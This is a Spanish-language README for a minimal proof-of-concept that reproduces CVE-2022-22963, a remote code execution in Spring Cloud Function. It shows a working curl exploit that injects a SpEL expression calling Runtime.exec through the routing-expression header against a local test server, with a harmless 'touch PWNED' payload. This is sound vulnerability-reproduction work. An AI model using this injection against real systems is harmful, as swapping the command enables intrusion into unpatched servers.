
Prueba de concepto mínima para la ejecución remota de código CVE-2022-22963 en Spring Cloud Function mediante inyección de SpEL. Demuestra la explotación con curl y un servidor vulnerable.
Ejemplo mínimo para reproducir la ejecución remota de código CVE-2022-22963 en org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
Como resultado del exploit, se creará el archivo PWNED junto a pom.xml.